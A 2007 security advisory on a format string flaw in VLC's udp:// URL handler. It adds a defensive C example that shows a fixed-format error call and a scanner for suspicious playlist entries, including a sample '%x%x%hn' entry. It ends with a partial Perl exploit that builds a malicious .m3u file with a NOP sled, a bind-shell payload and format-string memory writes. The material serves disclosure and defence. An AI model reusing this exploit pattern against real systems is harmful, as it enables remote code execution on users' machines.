VLC Media Player UDP URL Handler Format String Vulnerability
3 Jan. 2007
Summary
VideoLAN is "a software project, which produces free software for video, released under the GNU General Public License. The main product is the cross-platform VLC media player - a highly portable multimedia player for various audio and video formats".
A format string vulnerability exists in the handling of the udp:// URL handler: part of a udp:// URL reaches a printf-style function as the format string rather than as an argument. By supplying a specially crafted string (for example, inside a playlist entry), a remote attacker could execute arbitrary code with the privileges of the user running VLC.
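The following C example is added here and is not VLC's code or the advisory author's: it shows the hardened way to report the error (the untrusted URL passed as a %s argument, never as the format) and a simple detection routine that flags playlist entries whose URL contains printf conversion directives, especially the write directive %n. The message text "Can't get file status for " is taken from the exploit's length calculation on this page and is assumed, for illustration only, to be the message involved; the playlist lines are constructed sample input.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hardened error reporter (hypothetical). The vulnerable shape of this
 * function would be fprintf(stderr, msg) with the URL already spliced into
 * msg, so any %x / %n in the URL is interpreted by fprintf. Passing the
 * URL as an argument to a fixed format removes that interpretation. */
void report_stat_failure(const char *url) {
    fprintf(stderr, "Can't get file status for %s\n", url);
}

/* Count printf-style conversion directives in an untrusted string and
 * report whether any of them is a %n (memory write) directive.
 * "%%" is a literal percent and is not counted. Flags, field width,
 * precision and length modifiers (h, l, hh, hn, ...) are skipped so that
 * "%hn" and "%08x" are recognised as single directives. */
int count_format_directives(const char *s, int *has_n) {
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;          /* "%%" escape, not a directive */
        if (*p == '\0') break;            /* dangling '%' at end of string */
        while (*p && strchr("-+ #0", *p)) p++;                         /* flags */
        while (*p && (isdigit((unsigned char)*p) || *p == '*' || *p == '$')) p++; /* width */
        if (*p == '.') {                                               /* precision */
            p++;
            while (*p && (isdigit((unsigned char)*p) || *p == '*')) p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;                       /* length modifiers */
        if (*p == '\0') break;
        count++;
        if (*p == 'n') *has_n = 1;
    }
    return count;
}

/* Constructed sample playlist (not from the advisory): one benign multicast
 * entry and one entry whose URL carries conversion directives. */
const char *SAMPLE_M3U =
    "#EXTM3U\n"
    "#EXTINF:0,clip\n"
    "udp://@239.0.0.1:1234\n"
    "#EXTINF:0,bad\n"
    "udp://--%x%x%hn\n";

/* Scan an M3U text line by line and count non-comment entries that contain
 * at least one conversion directive. Lines are copied into a bounded buffer
 * so an overlong line cannot overflow it. */
int count_suspicious_entries(const char *m3u) {
    int flagged = 0;
    const char *line = m3u;
    while (*line) {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) : strlen(line);
        char buf[512];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (buf[0] != '#') {               /* skip #EXTM3U / #EXTINF directives */
            int has_n;
            if (count_format_directives(buf, &has_n) > 0) {
                flagged++;
                printf("suspicious entry%s: %s\n", has_n ? " (contains %n)" : "", buf);
            }
        }
        line = end ? end + 1 : line + len;
    }
    return flagged;
}

int main(void) {
    int flagged = count_suspicious_entries(SAMPLE_M3U);
    printf("%d suspicious entr%s\n", flagged, flagged == 1 ? "y" : "ies");
    report_stat_failure("udp://--%x%x%hn");   /* printed verbatim, not interpreted */
    return 0;
}
```

The scanner is a triage aid for playlists from untrusted sources, not a substitute for the fix: the real mitigation is the fixed-format call in report_stat_failure (and compiling with -Wformat-security, which warns on a non-literal format with no arguments), because a URL has no legitimate reason to be interpreted as a format string.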
Vulnerable Systems:
* VLC version 0.8.6 for Mac OS X
* Previous versions and other platforms might be affected
Proof of concept:
The exploits provided will create an M3U file, which can be opened locally or served remotely from a web server. The exploit source code includes notes and other comments about the different options available. Both x86 and PowerPC versions are provided.
Exploit x86:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile");
print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell . "\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";
close(PWNED);
Exploit PPC:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#